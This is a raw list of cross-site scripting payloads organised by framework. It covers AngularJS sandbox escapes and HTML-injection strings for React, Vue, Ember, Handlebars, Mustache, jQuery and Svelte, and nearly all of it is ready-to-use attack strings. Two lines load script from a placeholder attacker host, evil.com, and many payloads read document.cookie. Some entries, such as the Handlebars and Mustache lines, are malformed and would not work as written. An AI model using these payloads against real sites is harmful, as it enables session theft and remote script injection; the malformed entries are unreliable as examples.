# AngularJS Payloads
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{$eval('alert(1)')}}
{{$eval.constructor('alert(1)')()}}
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\\\._){window\\\\._=1;alert(1)}')+'\"';")}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)')}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//}')}}
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)')}}
{{c=''.constructor.prototype;c.charAt=c.trim;$eval('alert(1)')}}
{{''.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\\\._){window\\\\._=1;alert(1)}')+'\"';")}}
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window._){window._=1;alert(1)}')+"'")}}
{{(_=''.valueOf).call.call({}[(_)].getOwnPropertyDescriptor((_).__proto__,(_)).value,0,'alert(1)')()}}
{{(_=''.sub).call.call({}[(_='constructor')].getOwnPropertyDescriptor((_).__proto__,(_)).value,0,'alert(1)')()}}
{{$eval.toString().constructor.prototype.toString=$eval.toString().constructor.prototype.call;['a','alert(1)'].sort($eval.toString().constructor);}}
{{$eval("(function(){var _=document.createElement('script');_.src='//evil.com/xss.js';document.body.appendChild(_)})();")}}
{{$eval("(function(){var _=document.createElement('iframe');_.src='javascript:alert(1)';document.body.appendChild(_)})();")}}
{{constructor.constructor('alert(document.domain)')()}}
{{constructor.constructor('alert(document.cookie)')()}}
<div ng-app ng-csp>{{constructor.constructor('alert(1)')()}}</div>
<div ng-app>{{constructor.constructor('alert(1)')()}}</div>
<div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
<div ng-app>{{$eval.constructor('alert(1)')()}}</div>
<div ng-app ng-csp>{{$eval('alert(1)')}}</div>
<div ng-app>{{$eval('alert(1)')}}</div>

# React Payloads
React.createElement('div', {dangerouslySetInnerHTML: {__html: 'alert(1)'}})
React.createElement('div', {dangerouslySetInnerHTML: {__html: '<img src=x onerror=alert(1)>'}})
React.createElement('div', {dangerouslySetInnerHTML: {__html: '<svg onload=alert(1)>'}})
React.createElement('div', {dangerouslySetInnerHTML: {__html: '<iframe src=javascript:alert(1)>'}})
React.createElement('div', {dangerouslySetInnerHTML: {__html: '<script>alert(1)</script>'}})
React.createElement('div', {dangerouslySetInnerHTML: {__html: '<img src=x onerror=alert(document.domain)>'}})
React.createElement('div', {dangerouslySetInnerHTML: {__html: '<img src=x onerror=alert(document.cookie)>'}})
React.createElement('div', {dangerouslySetInnerHTML: {__html: '<svg onload=alert(document.domain)>'}})
React.createElement('div', {dangerouslySetInnerHTML: {__html: '<svg onload=alert(document.cookie)>'}})
React.createElement('div', {dangerouslySetInnerHTML: {__html: '<iframe src=javascript:alert(document.domain)>'}})
React.createElement('div', {dangerouslySetInnerHTML: {__html: '<iframe src=javascript:alert(document.cookie)>'}})
React.createElement('div', {dangerouslySetInnerHTML: {__html: '<script>alert(document.domain)</script>'}})
React.createElement('div', {dangerouslySetInnerHTML: {__html: '<script>alert(document.cookie)</script>'}})

# Vue.js Payloads
<div v-html="'<img src=x onerror=alert(1)>'"></div>
<div v-html="'<svg onload=alert(1)>'"></div>
<div v-html="'<iframe src=javascript:alert(1)>'"></div>
<div v-html="'<script>alert(1)</script>'"></div>
<div v-html="'<img src=x onerror=alert(document.domain)>'"></div>
<div v-html="'<img src=x onerror=alert(document.cookie)>'"></div>
<div v-html="'<svg onload=alert(document.domain)>'"></div>
<div v-html="'<svg onload=alert(document.cookie)>'"></div>
<div v-html="'<iframe src=javascript:alert(document.domain)>'"></div>
<div v-html="'<iframe src=javascript:alert(document.cookie)>'"></div>
<div v-html="'<script>alert(document.domain)</script>'"></div>
<div v-html="'<script>alert(document.cookie)</script>'"></div>

# Ember.js Payloads
{{html-safe '<img src=x onerror=alert(1)>'}}
{{html-safe '<svg onload=alert(1)>'}}
{{html-safe '<iframe src=javascript:alert(1)>'}}
{{html-safe '<script>alert(1)</script>'}}
{{html-safe '<img src=x onerror=alert(document.domain)>'}}
{{html-safe '<img src=x onerror=alert(document.cookie)>'}}
{{html-safe '<svg onload=alert(document.domain)>'}}
{{html-safe '<svg onload=alert(document.cookie)>'}}
{{html-safe '<iframe src=javascript:alert(document.domain)>'}}
{{html-safe '<iframe src=javascript:alert(document.cookie)>'}}
{{html-safe '<script>alert(document.domain)</script>'}}
{{html-safe '<script>alert(document.cookie)</script>'}}

# Handlebars Payloads
{{{<img src=x onerror=alert(1)>}}}
{{{<svg onload=alert(1)>}}}
{{{<iframe src=javascript:alert(1)>}}}
{{{<script>alert(1)</script>}}}
{{{<img src=x onerror=alert(document.domain)>}}}
{{{<img src=x onerror=alert(document.cookie)>}}}
{{{<svg onload=alert(document.domain)>}}}
{{{<svg onload=alert(document.cookie)>}}}
{{{<iframe src=javascript:alert(document.domain)>}}}
{{{<iframe src=javascript:alert(document.cookie)>}}}
{{{<script>alert(document.domain)</script>}}}
{{{<script>alert(document.cookie)</script>}}}

# Mustache Payloads
{{{<img src=x onerror=alert(1)>}}}
{{{<svg onload=alert(1)>}}}
{{{<iframe src=javascript:alert(1)>}}}
{{{<script>alert(1)</script>}}}
{{{<img src=x onerror=alert(document.domain)>}}}
{{{<img src=x onerror=alert(document.cookie)>}}}
{{{<svg onload=alert(document.domain)>}}}
{{{<svg onload=alert(document.cookie)>}}}
{{{<iframe src=javascript:alert(document.domain)>}}}
{{{<iframe src=javascript:alert(document.cookie)>}}}
{{{<script>alert(document.domain)</script>}}}
{{{<script>alert(document.cookie)</script>}}}

# jQuery Payloads
$('selector').html('<img src=x onerror=alert(1)>')
$('selector').html('<svg onload=alert(1)>')
$('selector').html('<iframe src=javascript:alert(1)>')
$('selector').html('<script>alert(1)</script>')
$('selector').html('<img src=x onerror=alert(document.domain)>')
$('selector').html('<img src=x onerror=alert(document.cookie)>')
$('selector').html('<svg onload=alert(document.domain)>')
$('selector').html('<svg onload=alert(document.cookie)>')
$('selector').html('<iframe src=javascript:alert(document.domain)>')
$('selector').html('<iframe src=javascript:alert(document.cookie)>')
$('selector').html('<script>alert(document.domain)</script>')
$('selector').html('<script>alert(document.cookie)</script>')
$('selector').append('<img src=x onerror=alert(1)>')
$('selector').append('<svg onload=alert(1)>')
$('selector').append('<iframe src=javascript:alert(1)>')
$('selector').append('<script>alert(1)</script>')
$('selector').prepend('<img src=x onerror=alert(1)>')
$('selector').prepend('<svg onload=alert(1)>')
$('selector').prepend('<iframe src=javascript:alert(1)>')
$('selector').prepend('<script>alert(1)</script>')
$('selector').after('<img src=x onerror=alert(1)>')
$('selector').after('<svg onload=alert(1)>')
$('selector').after('<iframe src=javascript:alert(1)>')
$('selector').after('<script>alert(1)</script>')
$('selector').before('<img src=x onerror=alert(1)>')
$('selector').before('<svg onload=alert(1)>')
$('selector').before('<iframe src=javascript:alert(1)>')
$('selector').before('<script>alert(1)</script>')
$('selector').replaceWith('<img src=x onerror=alert(1)>')
$('selector').replaceWith('<svg onload=alert(1)>')
$('selector').replaceWith('<iframe src=javascript:alert(1)>')
$('selector').replaceWith('<script>alert(1)</script>')

# Svelte Payloads
{@html '<img src=x onerror=alert(1)>'}
{@html '<svg onload=alert(1)>'}
{@html '<iframe src=javascript:alert(1)>'}
{@html '<script>alert(1)</script>'}
{@html '<img src=x onerror=alert(document.domain)>'}
{@html '<img src=x onerror=alert(document.cookie)>'}
{@html '<svg onload=alert(document.domain)>'}
{@html '<svg onload=alert(document.cookie)>'}
{@html '<iframe src=javascript:alert(document.domain)>'}
{@html '<iframe src=javascript:alert(document.cookie)>'}
{@html '<script>alert(document.domain)</script>'}
{@html '<script>alert(document.cookie)</script>'} 

// RandomPayloads
<div ng-app>{{constructor.constructor('alert(1)')()}}</div>
<div ng-app ng-csp>{{constructor.constructor('alert(1)')()}}</div>
<div dangerouslySetInnerHTML={{__html: "<img src=x onerror=alert(1)>"}}></div>
<div v-html="'<img src=x onerror=alert(1)>'"></div>
<div v-bind:innerHTML="'<img src=x onerror=alert(1)>'"></div>
<script>$.get('http://evil.com/xss.js')</script>
<script>$('#target').html('<img src=x onerror=alert(1)>')</script>
<script>Ember.Handlebars.compile('<img src=x onerror=alert(1)>')</script>
<script>Ember.run(() => alert(1))</script>